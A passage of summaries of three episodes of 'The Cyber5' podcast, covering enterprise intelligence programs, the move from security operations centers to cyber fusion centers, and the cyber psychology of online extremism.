collaboration with the public sector. While this is happening at the tactical, strategic, and inter and intra-governmental levels, it is still not happening at the speed and scale necessary to be effective. The National Cybersecurity Center in the UK and the National Cyber Forensics and Training Alliance (NCFTA) are two organizations that bring together cybersecurity practices and investigative techniques.
In episode 42 of The Cyber5, we are joined by A.J. Nash, Senior Director of Cyber Intelligence Strategy at Anomali. A.J. discusses the steps and key components of building an enterprise intelligence program. Among the topics covered are frameworks, roles and responsibilities, critical skill sets, and metrics. 5 Topics Covered in this Episode: 1. Defining the Requirements with Key Stakeholders: Defining the intelligence requirements necessary to ensure the success of business stakeholders should always be step one. Sales, marketing, engineering, customer success, information technology, legal, and human resources will have different requirements. The security or intelligence team must prioritize the requirements in the context of what is best for the business and what meets the needs of the stakeholders. 2. Security and Intelligence Should Be Viewed as a Business Enabler: Regardless of industry or company size, the second key to success is committing that the security and intelligence team will be an enabler of business and not a cost center. As a result of the nature of their business, the many regulations they face, and the assets they hold, the finance industry has led the way in building intelligence programs. Other industries are following their lead as criminals are branching out to target a wider range of digital assets and PII. 3. An Inquisitive Mindset is Critical When Building Intelligence Programs: The ability to view disparate pieces of information with an inquisitive mind, and then communicate business risk is a critical skill set. Businesses often look for a combination of public sector and private sector intelligence experience when building an intelligence program. While enterprises often start by hiring a technical leader, a key to success is building a team of individuals with inquisitive minds. For example, former journalists have been known to become fantastic enterprise intelligence experts. 4. Risk Must Be Prioritized: An intelligence program is no different than any other enterprise program. Profit and risk must always be considered, and intelligence should be driving security requirements to enable the business. An intelligence program should identify adversarial intentions and capabilities, estimate the risk and cost of a successful attack, and consider the costs of controls that need to be implemented to defend against such adversaries. This must be properly communicated to the CEO, who ultimately owns key decisions. Intelligence programs span fraud, information security, physical security, executive protection, trust and safety, third party risk, and mergers and acquisitions. 5. Important Metrics for Intelligence Program: Mature programs build and provide key metrics based upon intelligence requirements. Metrics should focus on actions that were taken, intelligence that was analyzed, the subsequent controls that were put in place, and the decisions that were made by key stakeholders. There are currently no well-defined and accepted frameworks for intelligence programs. Most programs combine several existing frameworks, including MITRE ATT&CK, which is specific to information security. Intelligence programs need to proactively alert on threats and risk and quantify the success and failure of actions taken.
In episode 41 of the Cyber5, we are joined by Director of Cyber Defense Integration at Thomson Reuters, Cliff Webster. Cliff discusses the building and scaling of cyber fusion centers and their integral part in reducing risk to all facets of the business. Here are the 5 Topics We Cover in this Episode: Differentiating a Cyber Fusion Center over a Security Operations Team: (01:59-07:16) A cyber fusion center (CFC) is an evolution of the traditional security operations center (SOC). A SOC is mostly focused on reactive activities such as detection and incident response around detected malicious activity, whereas a CFC supplants the reactive detection mission with proactive activities such as new frameworks and identifying new threats before they hit an enterprise's logs and firewalls to gain efficiencies of speed in responding. Creating connective tissue through technology and process is a unique function of a CFC. A key function that differentiates a CFC from a SOC is moving data and information between teams and business units in a way that reduces attacker dwell time. Critical security functions that overlap with IT and are important to come together are threat intelligence, threat hunting, vulnerability management, asset inventory, and red team. Going Beyond Cyber Threat Intelligence: (07:16-09:03) A SOC is generally focused on threats against the confidentiality, integrity, and availability of data, systems, and networks. A CFC typically evolves with the same focus initially. However, over time, with the processes and technologies in place, a CFC can tackle other security challenges such as third party risk and elements of physical security because inevitably, it will require integration of other data sources to be successful such as questionnaire information and entry/exit badging. Critical Elements That Need to be in Place from a SOC: (09:03-14:20) The core capabilities that need to be in place from a SOC to make the evolution to a CFC are the following: 1) Threat intelligence is the engine that makes a successful Cyber Fusion Center that can drive priorities in vulnerability management, red teaming, application security, and even larger business unit product security. 2) A SOC with a SIEM to do basic log aggregation 3) A threat hunting team that can identify and correlate hypotheses from the threat intelligence or red team. This usually comes with significant investment in technology and security stack to tailor hunts on threat actor behavior. Critical data and log sources internally are: 1) User access logs 2) Server logs 3) Endpoint and EDR logs 4) Threat intelligence feeds 5) firewall logs 6) VPN logs 7) internal netflow 8) Application logs 9) PCAP if available. A critical element of strategic growth plans within a CFC is the ability to acquire all these datasets and correlate them with a SIEM in a meaningful manner that gives actionable alerts when there is a problem. Support from the Business Units and External Threat Hunting: (14:20-27:30) Engaging with the business units is a critical part of data acquisition strategy not only for appropriate log aggregation and correlation but also to work through outputs from the CFC when a security event occurs. With regard to external threat hunting, there is no shortage of external telemetry that can be collected, but this should be prioritized after an organization knows its own internal environment first. For third party risk management, this is a fundamental intelligence problem many enterprises are grappling with due to the challenges of monitoring key vendors at any type of scale with any consistency. Important Metrics for Cyber Fusion Centers: (27:30-37:00) Mature security teams aspire to be data driven organizations, and thus metrics are critical to capture: 1) From an intelligence perspective, baselines are important to record as metrics of what can be detected in addition to identifying gaps 2) Intelligence leading to an accelerated patching cycle that closed visibility gaps 3) Informing security architecture decisions that lead to policy changes such as removing a remote access tool to measure reduction in time that a gap was visible 4) Number of intelligence products helped an organization understand an initial security incident data 5) Intelligence tippers lead to the discovery of a security event.
In episode 40 of the Cyber5, we are joined by Professor of Cyber Psychology and former Producer of CSI Cyber, Mary Aiken. Mary discusses the psychology of online behavior, particularly with regard to social media and how it plays a critical role leading to extremist ideology. Here are the 5 Topics We Cover in this Episode: Defining Cyber Psychology as it Relates to Cyber Space: (01:00-05:52) Cyber psychology is the study of the impact of technology on human behavior. We maintain that human behavior can fundamentally change or mutate in cyber context. Key constructs include ODE, or the Online Disinhibition Effect, which dictates that people will perform actions in a cyber context they would not normally do in the real world. In addition, anonymity is a powerful psychological driver online and while some argue that online anonymity is a fundamental right, they are not accurate; it's an invention of the internet and behavior is evolving at the speed of technology. Defining Cyberspace for Corporate Enterprise: (05:24-09:52) In 2016, NATO ratified cyberspace as an environment, acknowledging battles of the future will take place on land, sea, air, and computer networks. In addition to thinking about how the military fights these future battles, it's also important for enterprises to understand how their businesses and employees operate online and address various threat actors. Psychology Evolving as Extremism Transitions Online: (09:52-12:00) People are prone to write more adversarial thoughts online because they are not receiving the same micro-expressions, body language, proximity, and feedback they would receive in person. Mary feels addiction does not exist with technology because we rely on it just like we rely on air or water; however, we have to play catch up as a society for how to recognize and curb aggressive online behavior. Online Safety Technology: (12:00-16:00) While a lot of threat intelligence is geared toward the confidentiality, integrity, and availability (C.I.A.) of data, systems, and networks, it does not focus on what it means to be human. Many in the business community, including Paladin Capital, are starting to invest in safety technologies and services that combat the relationship between the C.I.A. of data systems and the behavioral aspects of cyber security, such as insider threat, harassment, cyber bullying, and disinformation to deliver holistic security capabilities. Extremist Behavior Online Filtering into Violence in the Real World: (16:00-21:00) When people are constantly circulating in echo chambers online, fueled by false information and hate speech, combined with ODE, this has huge potential for violence in the real world, as displayed during the Capitol Hill riots in 2021. It's going to be critical for enterprises to monitor cyberspace from a brand reputation perspective, and not just for negative sentiment against products and services. It will also be critical to understanding the sentiment behind how employees behave in a manner that is not detrimental to the brand's image.